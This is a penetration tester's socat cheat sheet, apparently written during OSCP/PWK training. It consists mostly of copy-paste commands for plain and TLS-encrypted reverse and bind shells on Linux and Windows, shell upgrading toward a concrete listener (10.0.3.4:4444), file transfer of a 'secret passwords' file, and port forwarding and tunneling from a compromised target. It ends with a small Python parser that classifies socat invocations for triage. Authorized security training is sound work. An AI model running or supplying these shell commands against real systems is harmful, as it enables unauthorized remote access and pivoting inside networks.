Socat

Intro

I used socat heavily during PWK as it's a powerful tool. In addition to the functionality of netcat, socat lets you set up encrypted reverse/bind shells.
While all of this information is available in the help/man pages, you still have to piece together what you want from what the documentation provides.
I like to approach things from a conceptual standpoint. So rather than play with syntax or reread documentation until it's memorized, I prepare the commands I use most with a tool ahead of time and copy/paste them into a terminal.
This is particularly useful when time is of the essence, or just for building a PoC in general.

Info

Useful Switches

  • verbosity: -d
  • allow multiple connections: fork
  • do not verify SSL cert: verify=0
  • Windows specific syntax: pipes
  • writing to tcp socket over ipv4: TCP4:<rhost>:<rport>
  • reading tcp socket over ipv4: TCP4-LISTEN:<port>
  • shells: EXEC:/bin/bash
    • Windows specific syntax: EXEC:cmd.exe,pipes
    • Windows specific syntax (bash): EXEC:bash,pipes

Connecting To A Remote Listener Syntax

socat - TCP4:<remote server ip address>:<portnumber>

As a side note, socat requires the - address to transfer data between STDIO and the remote host (i.e. keyboard interaction).

Listening For A Connection

socat TCP4-LISTEN:<portnum> STDOUT

Root is required to bind a port below 1024.

File Transfers

Making a file available for consumption

socat TCP4-LISTEN:<portnum> file:<file to share>

Root is required to bind a port below 1024.

Retrieving a file

socat TCP4:<remote ip>:<remote port> file:received_secret_passwords.txt,create

Shells

Reverse Shells

socat TCP4:<rhost>:<rport> EXEC:/bin/bash

Windows specific syntax:

socat TCP4:<rhost>:<rport> EXEC:cmd.exe,pipes

socat TCP4:<rhost>:<rport> EXEC:bash,pipes

Encrypted Bind Shells

See SSL certificates for creating a .pem file.

target:

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

attacker:

socat - OPENSSL:<remote ip>:443,verify=0

Encrypted Reverse Shells

See SSL certificates for creating a .pem file.

target:

socat OPENSSL:<remote ip>:<remote port>,verify=0 EXEC:/bin/bash

attacker:

socat -d -d OPENSSL-LISTEN:<remote port>,cert=bind.pem,verify=0,fork STDOUT

Upgrading Reverse Shells

Listening Side:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Target Side:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Networking

Brittle port forwarding (not session based)

This is most useful for exposing a service running on localhost, for example.
your machine:

socat -v TCP4-LISTEN:10000 TCP4-LISTEN:8000

target machine:

socat TCP4:<my ip>:10000 TCP4:<internal webserver>:<internal webserver port>

Local Tunneling

On the target we listen on port 12080 and forward traffic to port 8080, which presumably is behind a firewall or otherwise unreachable from outside. So now from our attack box we can send traffic to port 8080 via port 12080.

socat TCP-LISTEN:12080,reuseaddr,fork TCP:0.0.0.0:8080 &
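As an added example (not part of the original notes), a small Python parser for the socat address syntax used throughout this page: it splits each address into type, target and comma-separated options, labels the command line as bind shell, reverse shell, port forward or file transfer, and flags fork, verify=0 and ports that need root. It is handy for checking a pasted command before running it, or for triaging socat invocations seen in process-creation logs. The names classify and parse_address are my own; the sample command lines in the comments are constructed.

```python
import shlex

# Address keywords used in the cheat sheet above, grouped by role (socat is case-insensitive)
LISTEN = {"TCP-LISTEN", "TCP4-LISTEN", "OPENSSL-LISTEN"}
CONNECT = {"TCP", "TCP4", "OPENSSL"}

def parse_address(spec):
    """Split 'TYPE:target,opt1,opt2=val' into (TYPE, target, {opt: val or True})."""
    head, _, rest = spec.partition(",")
    kind, _, target = head.partition(":")
    opts = {}
    for item in filter(None, rest.split(",")):
        name, _, value = item.partition("=")
        opts[name] = value or True
    return kind.upper(), target, opts

def classify(cmdline):
    """Describe what a socat command line does; raises ValueError if it is not socat."""
    argv = shlex.split(cmdline)
    if argv[:1] == ["sudo"]:
        argv = argv[1:]
    # drop switches such as -d -d or -v; a bare '-' is the STDIO address, not a switch
    addrs = [parse_address(a) for a in argv[1:] if a == "-" or not a.startswith("-")]
    if argv[:1] != ["socat"] or len(addrs) != 2:
        raise ValueError("expected: socat [switches] <address1> <address2>")
    info = {"listen": [], "connect": [], "exec": [], "file": [],
            "fork": False, "tls_unverified": False, "needs_root": False}
    for kind, target, opts in addrs:
        if kind in LISTEN:
            info["listen"].append(target)
            info["needs_root"] |= target.isdigit() and int(target) < 1024
        elif kind in CONNECT:
            info["connect"].append(target)
        elif kind == "EXEC":
            info["exec"].append(target)
        elif kind == "FILE" and "tty" not in target:
            # file:`tty` (the shell upgrade trick) is the local terminal, not a transfer
            info["file"].append(target)
        info["fork"] |= "fork" in opts
        info["tls_unverified"] |= opts.get("verify") == "0"
    roles = [("bind shell", info["exec"] and info["listen"]),
             ("reverse shell", info["exec"] and info["connect"]),
             ("port forward", info["listen"] and info["connect"]),
             ("file transfer", info["file"])]
    info["role"] = next((r for r, hit in roles if hit), "plain client/listener")
    return info

# e.g. classify("sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash")
# -> role 'bind shell', listen ['443'], fork True, tls_unverified True, needs_root True
```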